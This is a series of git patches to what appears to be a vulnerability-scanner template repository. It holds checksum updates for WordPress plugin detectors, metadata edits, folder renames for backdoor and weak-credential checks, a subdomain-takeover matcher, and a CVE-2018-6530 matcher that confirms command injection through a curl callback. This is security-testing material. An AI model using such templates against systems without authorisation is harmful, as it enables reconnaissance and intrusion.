-http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 +http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c +http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d +http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 +http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e +http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 +http/technologies/wordpress/plugins/post-types-order.yaml:ac4e48bb51998b2fb77e25135e3a34ccd1ff5bb3 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 +http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 +http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 +http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 +http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd +http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 +http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:0869b92e5fc5980a1d9af28e866cba52048985d7 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 -http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da +http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd +http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f -http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 -http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa -http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 -http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 -http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 -http/technologies/wordpress/plugins/under-construction-page.yaml:cab0384d64d3d0621ab71655e8ad6c30b862de74 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 +http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc +http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b +http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 +http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a +http/technologies/wordpress/plugins/under-construction-page.yaml:262bf6f78177ba5b569e23f498beeef8f35cc453 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:60fe37dcc4096c4f3780d83c361552fec4a0bccb -http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd -http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 -http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 -http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:d4e216da24359b39cc1229c175f3645fb166139e -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee -http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba -http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 +http/technologies/wordpress/plugins/updraftplus.yaml:581d99c9e67beb70a5e5c360d55e56a4f0e55619 +http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 +http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e +http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 +http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:3cee84059c9924bec0e4c4a42c30618ce4bcf6b6 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 +http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 +http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 -http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 -http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 -http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 -http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a -http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 -http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded -http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 -http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 -http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 -http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad -http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 -http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f -http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 -http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 -http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb +http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee +http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c +http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 +http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f +http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 +http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c +http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 +http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce +http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 +http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b +http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b +http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 +http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 +http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 +http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 +http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -6486,7 +6487,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:f22f12b1a904c5158e762c6a53b819d9dcdfe19c +templates-checksum.txt:8c093d0f2221e6f0f69c1acaadcdd8c214460c27 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 6e5d86f52924942a3857b4a8d189152bc2869139 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 3 Jul 2023 05:31:57 +0000 Subject: [PATCH 293/609] TemplateMan Update [Mon Jul 3 05:31:57 UTC 2023] :robot: --- http/exposed-panels/untangle-admin-login.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/http/exposed-panels/untangle-admin-login.yaml b/http/exposed-panels/untangle-admin-login.yaml index cc0fc96e0b..3fa8b3e3ad 100644 --- a/http/exposed-panels/untangle-admin-login.yaml +++ b/http/exposed-panels/untangle-admin-login.yaml @@ -6,15 +6,15 @@ info: severity: info description: | Untangle Administrator is a centralized web-based management console that allows administrators to efficiently configure, monitor, and control various network security and filtering features provided by the Untangle NG Firewall, ensuring robust network protection and policy enforcement. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://edge.arista.com/ng-firewall/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 metadata: - verified: true + max-request: 2 shodan-query: title:"Untangle Administrator Login" + verified: true tags: panel,untangle,admin,login http: From 1a015f086ed94ee2abf5a3193a7846fd5808881f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 3 Jul 2023 12:10:58 +0530 Subject: [PATCH 294/609] Update and rename addeventlistener-detect to addeventlistener-detect.yaml --- .../{addeventlistener-detect => addeventlistener-detect.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/miscellaneous/{addeventlistener-detect => addeventlistener-detect.yaml} (100%) diff --git a/http/miscellaneous/addeventlistener-detect b/http/miscellaneous/addeventlistener-detect.yaml similarity index 100% rename from http/miscellaneous/addeventlistener-detect rename to http/miscellaneous/addeventlistener-detect.yaml From 0e91a6154b286bcd4d41b08d73564d060879b8a3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 3 Jul 2023 12:16:42 +0530 Subject: [PATCH 295/609] fix directory and matcher --- {cves => http/cves}/2018/CVE-2018-6530.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) rename {cves => http/cves}/2018/CVE-2018-6530.yaml (93%) diff --git a/cves/2018/CVE-2018-6530.yaml b/http/cves/2018/CVE-2018-6530.yaml similarity index 93% rename from cves/2018/CVE-2018-6530.yaml rename to http/cves/2018/CVE-2018-6530.yaml index b21a673f5e..56278bc323 100644 --- a/cves/2018/CVE-2018-6530.yaml +++ b/http/cves/2018/CVE-2018-6530.yaml @@ -33,4 +33,8 @@ requests: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# Enhanced by mp on 2022/04/26 + + - type: word + part: interactsh_request + words: + - "User-Agent: curl" From 72d144cd52b95c162ac62566201699df0ef75e66 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 3 Jul 2023 12:28:37 +0530 Subject: [PATCH 296/609] Network Directory - Restructuring --- network/{ => backdoor}/vsftpd-backdoor.yaml | 0 network/{ => default-login}/ftp-anonymous-login.yaml | 0 network/{ => default-login}/ftp-weak-credentials.yaml | 0 network/{ => detection}/detect-addpac-voip-gateway.yaml | 0 network/{ => detection}/detect-jabber-xmpp.yaml | 0 network/{ => detection}/expn-mail-detect.yaml | 0 network/{ => detection}/sap-router.yaml | 0 network/{ => exposures}/cisco-smi-exposure.yaml | 0 network/{ => exposures}/exposed-adb.yaml | 0 network/{ => exposures}/exposed-dockerd.yaml | 0 network/{ => exposures}/exposed-redis.yaml | 0 network/{ => exposures}/exposed-zookeeper.yaml | 0 network/{ => misconfig}/clamav-unauth.yaml | 0 network/{ => misconfig}/clickhouse-unauth.yaml | 0 network/{ => misconfig}/ganglia-xml-grid-monitor.yaml | 0 network/{ => misconfig}/memcached-stats.yaml | 0 network/{ => misconfig}/mongodb-unauth.yaml | 0 network/{ => misconfig}/mysql-native-password.yaml | 0 network/{ => misconfig}/printers-info-leak.yaml | 0 network/{ => misconfig}/sap-router-info-leak.yaml | 0 network/{ => misconfig}/tidb-native-password.yaml | 0 network/{ => misconfig}/tidb-unauth.yaml | 0 22 files changed, 0 insertions(+), 0 deletions(-) rename network/{ => backdoor}/vsftpd-backdoor.yaml (100%) rename network/{ => default-login}/ftp-anonymous-login.yaml (100%) rename network/{ => default-login}/ftp-weak-credentials.yaml (100%) rename network/{ => detection}/detect-addpac-voip-gateway.yaml (100%) rename network/{ => detection}/detect-jabber-xmpp.yaml (100%) rename network/{ => detection}/expn-mail-detect.yaml (100%) rename network/{ => detection}/sap-router.yaml (100%) rename network/{ => exposures}/cisco-smi-exposure.yaml (100%) rename network/{ => exposures}/exposed-adb.yaml (100%) rename network/{ => exposures}/exposed-dockerd.yaml (100%) rename network/{ => exposures}/exposed-redis.yaml (100%) rename network/{ => exposures}/exposed-zookeeper.yaml (100%) rename network/{ => misconfig}/clamav-unauth.yaml (100%) rename network/{ => misconfig}/clickhouse-unauth.yaml (100%) rename network/{ => misconfig}/ganglia-xml-grid-monitor.yaml (100%) rename network/{ => misconfig}/memcached-stats.yaml (100%) rename network/{ => misconfig}/mongodb-unauth.yaml (100%) rename network/{ => misconfig}/mysql-native-password.yaml (100%) rename network/{ => misconfig}/printers-info-leak.yaml (100%) rename network/{ => misconfig}/sap-router-info-leak.yaml (100%) rename network/{ => misconfig}/tidb-native-password.yaml (100%) rename network/{ => misconfig}/tidb-unauth.yaml (100%) diff --git a/network/vsftpd-backdoor.yaml b/network/backdoor/vsftpd-backdoor.yaml similarity index 100% rename from network/vsftpd-backdoor.yaml rename to network/backdoor/vsftpd-backdoor.yaml diff --git a/network/ftp-anonymous-login.yaml b/network/default-login/ftp-anonymous-login.yaml similarity index 100% rename from network/ftp-anonymous-login.yaml rename to network/default-login/ftp-anonymous-login.yaml diff --git a/network/ftp-weak-credentials.yaml b/network/default-login/ftp-weak-credentials.yaml similarity index 100% rename from network/ftp-weak-credentials.yaml rename to network/default-login/ftp-weak-credentials.yaml diff --git a/network/detect-addpac-voip-gateway.yaml b/network/detection/detect-addpac-voip-gateway.yaml similarity index 100% rename from network/detect-addpac-voip-gateway.yaml rename to network/detection/detect-addpac-voip-gateway.yaml diff --git a/network/detect-jabber-xmpp.yaml b/network/detection/detect-jabber-xmpp.yaml similarity index 100% rename from network/detect-jabber-xmpp.yaml rename to network/detection/detect-jabber-xmpp.yaml diff --git a/network/expn-mail-detect.yaml b/network/detection/expn-mail-detect.yaml similarity index 100% rename from network/expn-mail-detect.yaml rename to network/detection/expn-mail-detect.yaml diff --git a/network/sap-router.yaml b/network/detection/sap-router.yaml similarity index 100% rename from network/sap-router.yaml rename to network/detection/sap-router.yaml diff --git a/network/cisco-smi-exposure.yaml b/network/exposures/cisco-smi-exposure.yaml similarity index 100% rename from network/cisco-smi-exposure.yaml rename to network/exposures/cisco-smi-exposure.yaml diff --git a/network/exposed-adb.yaml b/network/exposures/exposed-adb.yaml similarity index 100% rename from network/exposed-adb.yaml rename to network/exposures/exposed-adb.yaml diff --git a/network/exposed-dockerd.yaml b/network/exposures/exposed-dockerd.yaml similarity index 100% rename from network/exposed-dockerd.yaml rename to network/exposures/exposed-dockerd.yaml diff --git a/network/exposed-redis.yaml b/network/exposures/exposed-redis.yaml similarity index 100% rename from network/exposed-redis.yaml rename to network/exposures/exposed-redis.yaml diff --git a/network/exposed-zookeeper.yaml b/network/exposures/exposed-zookeeper.yaml similarity index 100% rename from network/exposed-zookeeper.yaml rename to network/exposures/exposed-zookeeper.yaml diff --git a/network/clamav-unauth.yaml b/network/misconfig/clamav-unauth.yaml similarity index 100% rename from network/clamav-unauth.yaml rename to network/misconfig/clamav-unauth.yaml diff --git a/network/clickhouse-unauth.yaml b/network/misconfig/clickhouse-unauth.yaml similarity index 100% rename from network/clickhouse-unauth.yaml rename to network/misconfig/clickhouse-unauth.yaml diff --git a/network/ganglia-xml-grid-monitor.yaml b/network/misconfig/ganglia-xml-grid-monitor.yaml similarity index 100% rename from network/ganglia-xml-grid-monitor.yaml rename to network/misconfig/ganglia-xml-grid-monitor.yaml diff --git a/network/memcached-stats.yaml b/network/misconfig/memcached-stats.yaml similarity index 100% rename from network/memcached-stats.yaml rename to network/misconfig/memcached-stats.yaml diff --git a/network/mongodb-unauth.yaml b/network/misconfig/mongodb-unauth.yaml similarity index 100% rename from network/mongodb-unauth.yaml rename to network/misconfig/mongodb-unauth.yaml diff --git a/network/mysql-native-password.yaml b/network/misconfig/mysql-native-password.yaml similarity index 100% rename from network/mysql-native-password.yaml rename to network/misconfig/mysql-native-password.yaml diff --git a/network/printers-info-leak.yaml b/network/misconfig/printers-info-leak.yaml similarity index 100% rename from network/printers-info-leak.yaml rename to network/misconfig/printers-info-leak.yaml diff --git a/network/sap-router-info-leak.yaml b/network/misconfig/sap-router-info-leak.yaml similarity index 100% rename from network/sap-router-info-leak.yaml rename to network/misconfig/sap-router-info-leak.yaml diff --git a/network/tidb-native-password.yaml b/network/misconfig/tidb-native-password.yaml similarity index 100% rename from network/tidb-native-password.yaml rename to network/misconfig/tidb-native-password.yaml diff --git a/network/tidb-unauth.yaml b/network/misconfig/tidb-unauth.yaml similarity index 100% rename from network/tidb-unauth.yaml rename to network/misconfig/tidb-unauth.yaml From 43f4415cdda144680d55845b4e7e044bbc3fbb8a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 3 Jul 2023 16:05:07 +0530 Subject: [PATCH 297/609] Update dell-idrac.yaml --- http/exposed-panels/dell-idrac.yaml | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/http/exposed-panels/dell-idrac.yaml b/http/exposed-panels/dell-idrac.yaml index 84c231693d..7b2ba678d4 100644 --- a/http/exposed-panels/dell-idrac.yaml +++ b/http/exposed-panels/dell-idrac.yaml @@ -10,8 +10,9 @@ info: cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 2 - tags: panel,idrac + verified: true + shodan-query: html:"thisIDRACText" + tags: panel,idrac,dell,detect http: - method: GET @@ -20,11 +21,14 @@ http: - '{{BaseURL}}/login.html' stop-at-first-match: true - matchers: - type: word part: body words: - ' Date: Mon, 3 Jul 2023 17:59:02 +0200 Subject: [PATCH 298/609] Update cacti-weathermap-file-write.yaml removing broken reference Reference does not exist on website anymore, no cached version found and I also couldn't find a good replacement reference. --- http/vulnerabilities/other/cacti-weathermap-file-write.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/http/vulnerabilities/other/cacti-weathermap-file-write.yaml b/http/vulnerabilities/other/cacti-weathermap-file-write.yaml index db66d5f43c..305624284b 100644 --- a/http/vulnerabilities/other/cacti-weathermap-file-write.yaml +++ b/http/vulnerabilities/other/cacti-weathermap-file-write.yaml @@ -4,8 +4,6 @@ info: name: Cacti Weathermap File Write author: pikpikcu severity: medium - reference: - - https://www.freebuf.com/articles/system/125177.html tags: injection,cacti metadata: max-request: 2 From 75a8c562a3c637a6112aaa522950b512cab09144 Mon Sep 17 00:00:00 2001 From: Moses Frost Date: Mon, 3 Jul 2023 12:44:47 -0400 Subject: [PATCH 299/609] Heroku Takeover THe Heroku Takeover YAML file needed to be updated in order to support a change in their title message. This was causing the template to fail. --- http/takeovers/heroku-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/takeovers/heroku-takeover.yaml b/http/takeovers/heroku-takeover.yaml index 9c4e3862c2..0e656470d0 100644 --- a/http/takeovers/heroku-takeover.yaml +++ b/http/takeovers/heroku-takeover.yaml @@ -24,5 +24,5 @@ http: - type: word words: - "herokucdn.com/error-pages/no-such-app.html" - - "No such app" + - "Heroku | Application Error" condition: and From ac390d4f9ac434bc44e261431207a38434e0ec49 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 3 Jul 2023 23:45:00 +0530 Subject: [PATCH 300/609] Create CVE-2023-28121.yaml (#7605) * Create CVE-2023-28121.yaml * misc updates --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> --- http/cves/2023/CVE-2023-28121.yaml | 69 